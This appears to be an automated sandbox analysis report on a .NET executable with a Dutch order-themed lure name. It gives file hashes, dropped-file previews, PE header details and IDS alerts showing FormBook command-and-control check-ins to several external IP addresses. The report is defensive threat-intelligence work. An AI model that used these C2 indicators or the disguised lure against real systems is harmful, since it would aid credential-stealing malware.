                                                                                                                                                                            MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                            SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                            SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                            SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):138356
                                                                                                                                                                            Entropy (8bit):7.809609231921042
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                            MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                            SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                            SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                            SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1753
                                                                                                                                                                            Entropy (8bit):5.8889033066924155
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                            MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                            SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                            SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                            SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9815
                                                                                                                                                                            Entropy (8bit):6.1716321262973315
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                            MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                            SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                            SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                            SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):10388
                                                                                                                                                                            Entropy (8bit):6.174387413738973
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                            MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                            SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                            SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                            SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):962
                                                                                                                                                                            Entropy (8bit):5.698567446030411
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                            MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                            SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                            SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                            SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):11185
                                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                            Entropy (8bit):0.1029230017316723
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:/x+ytcl1M25ytLIHFxBtvCwW+ytJU/dlRsltFll2/lsllK+ytxttT:3Wv3okFxBswWB70ql3+tsSBXt1
                                                                                                                                                                            MD5:2038AB478E726155B7355C19DCF6F0F0
                                                                                                                                                                            SHA1:AF565C228B2730E15D9BF2A41C16AF9652C944A1
                                                                                                                                                                            SHA-256:AFCA3DCAAF9704B31AB4F5CD1BC0B17F8D7603D7CBC3A854A8C0F25283495F17
                                                                                                                                                                            SHA-512:2856BEC65B8FE0DFF756B1EF165D319560B7FBDF8BF719860FAF33E03A01C92DD29824077F75A5FB76BCF6B44A38EC393706E5B486E1682A00386B4C0B5E87E9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                            Entropy (8bit):0.2364979660455589
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:3NvM7yGpSU3NvM7y8Dy+DygoDyKqDlsN2cgJ8H1C:9vqyVKvqy6yEyvy5DlsN5Ac
                                                                                                                                                                            MD5:7DA63F3349ADCE46708E4C0690063EC5
                                                                                                                                                                            SHA1:3A4B1BC2A9F48A8E4227E461B85B46F14CA69D3D
                                                                                                                                                                            SHA-256:C40819535B4185A8DB93B768A6B27657C5234D9789992D278CC01A4B3E353775
                                                                                                                                                                            SHA-512:20C16F35AFA9B663C268224BE0AC6CFCAD7F5EDD2F3903E50BA5803ECC421BF54ED974001D3F056CA8E830832C874BA53AD30B111000ECBA361B9DF18BE2265F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                            Entropy (8bit):0.2364979660455589
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:3NvM7yGpSU3NvM7y8Dy+DygoDyKqDlsN16gJ8H1C:9vqyVKvqy6yEyvy5DlsNUAc
                                                                                                                                                                            MD5:766DC8C2D2B704377A5D7A7CF489F4B1
                                                                                                                                                                            SHA1:DD1B20EA878BAC7D8AEB1A77C3EEE35429A069BE
                                                                                                                                                                            SHA-256:56669F04C60CBD07A2EE32D7B66236E4DE354EE94A1C34BAF25B6B3ED203E159
                                                                                                                                                                            SHA-512:59EAE579720FCD522F65D796101FD2B16EE20DD5D9812386436345BFE009961C3A6785F994E85AAFAEDC9F198E58BC671D367377550604CD99CF76EB88211E94
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                            Entropy (8bit):4.421800576448756
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:gSvfpi6ceLP/9skLmb0OTeWSPHaJG8nAgeMZMMhA2fX4WABlEnNq0uhiTw:LvloTeW+EZMM6DFys03w
                                                                                                                                                                            MD5:CD73CF3638BC7D14F79319EE8EE08B7D
                                                                                                                                                                            SHA1:426C552CC5DBAE0ACEAF905100B6A78F5D269EB5
                                                                                                                                                                            SHA-256:805414BC89E01B26BA606045B6B60DE48A02C6B4321BBAF83F7181AEF71C5AD3
                                                                                                                                                                            SHA-512:CA885496BF17E4D90B8F45E3A6509C8719775ABCCEA390FB17F32384229AD940D170F1FD1E9B3B0DF4353198C1FF087F0460CA76308BA004533A4DCE69846E8C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm6/. .K..............................................................................................................................................................................................................................................................................................................................................8...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Entropy (8bit):7.997384477874889
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                                                                                                                                            • Win64 Executable Console (202006/5) 47.64%
                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 2.83%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.47%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.47%
                                                                                                                                                                            File name:Nieuwebestellingen10122024.exe
                                                                                                                                                                            File size:644'232 bytes
                                                                                                                                                                            MD5:9a344f7aa0c680768aba67a0738dee2a
                                                                                                                                                                            SHA1:f7d395145a4e8b164e505971dd27c5b201f41a09
                                                                                                                                                                            SHA256:d8a46beafd4bd9945e59fbca9ad1801400b77173aa987651b8f434148bfd4d94
                                                                                                                                                                            SHA512:8f67b10f061ec8bf46657785c11e70f5bcd07f51934cf24b079c41d61cc0758870e0bd9568696c1e847a5db35fc191fbba0d0ea5d3e121dc494296fc04418f7e
                                                                                                                                                                            SSDEEP:12288:44Nx8ovpWeFMQwX+e0c1poVOFLU6ALFL7fhcHvzO6S+W+SE+xqSG6oEl:bNxjBNFOX+e0kWOFQ3fabO6SFZEgPmEl
                                                                                                                                                                            TLSH:CBD423AEAF104461C33C21BDDA4BE9C7A71DFB41C24B67648B07A99A7C9074D5BEE301
                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...fWXg.........."...0.................. ....@...... .......................`............`................................
                                                                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                                                                            Entrypoint:0x400000
                                                                                                                                                                            Entrypoint Section:
                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            Subsystem:windows cui
                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                            Time Stamp:0x67585766 [Tue Dec 10 14:59:50 2024 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                            File Version Major:4
                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                            Import Hash:
                                                                                                                                                                            Instruction
                                                                                                                                                                            dec ebp
                                                                                                                                                                            pop edx
                                                                                                                                                                            nop
                                                                                                                                                                            add byte ptr [ebx], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax+eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x5f6.rsrc
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                            .text0x20000x1ec40x2000957eefeaa455b5a104dc4959345263bfFalse0.614501953125data6.118476525832484IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .rsrc0x40000x5f60x6005826f3aed3590dec1a7579511b38ce91False0.4205729166666667data4.182503871777562IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                            RT_VERSION0x40a00x36cdata0.3972602739726027
                                                                                                                                                                            RT_MANIFEST0x440c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                            2024-12-11T09:40:02.370246+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549769185.106.176.20480TCP
                                                                                                                                                                            2024-12-11T09:40:09.078114+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499273.33.130.19080TCP
                                                                                                                                                                            2024-12-11T09:40:11.732638+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499343.33.130.19080TCP
                                                                                                                                                                            2024-12-11T09:40:11.732638+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.5499343.33.130.19080TCP
                                                                                                                                                                            2024-12-11T09:40:14.395620+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499443.33.130.19080TCP
                                                                                                                                                                            2024-12-11T09:40:17.046952+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5499533.33.130.19080TCP
                                                                                                                                                                            2024-12-11T09:40:32.322160+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499895.39.10.9380TCP
                                                                                                                                                                            2024-12-11T09:40:34.969331+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499955.39.10.9380TCP
                                                                                                                                                                            2024-12-11T09:40:37.656731+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500015.39.10.9380TCP
                                                                                                                                                                            2024-12-11T09:40:40.345915+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5500075.39.10.9380TCP
                                                                                                                                                                            2024-12-11T09:40:47.905990+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550029194.58.112.17480TCP
                                                                                                                                                                            2024-12-11T09:40:50.569209+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550035194.58.112.17480TCP
                                                                                                                                                                            2024-12-11T09:40:53.220446+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550041194.58.112.17480TCP
                                                                                                                                                                            2024-12-11T09:40:55.872136+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550047194.58.112.17480TCP
                                                                                                                                                                            2024-12-11T09:41:02.790862+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550069209.74.64.18780TCP
                                                                                                                                                                            2024-12-11T09:41:05.540813+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550075209.74.64.18780TCP
                                                                                                                                                                            2024-12-11T09:41:08.517051+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550081209.74.64.18780TCP
                                                                                                                                                                            2024-12-11T09:41:11.129093+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550087209.74.64.18780TCP
                                                                                                                                                                            2024-12-11T09:41:18.519515+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5501033.33.130.19080TCP
                                                                                                                                                                            2024-12-11T09:41:20.761015+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5501043.33.130.19080TCP
                                                                                                                                                                            2024-12-11T09:41:23.433677+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5501053.33.130.19080TCP
                                                                                                                                                                            2024-12-11T09:41:26.093993+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5501063.33.130.19080TCP
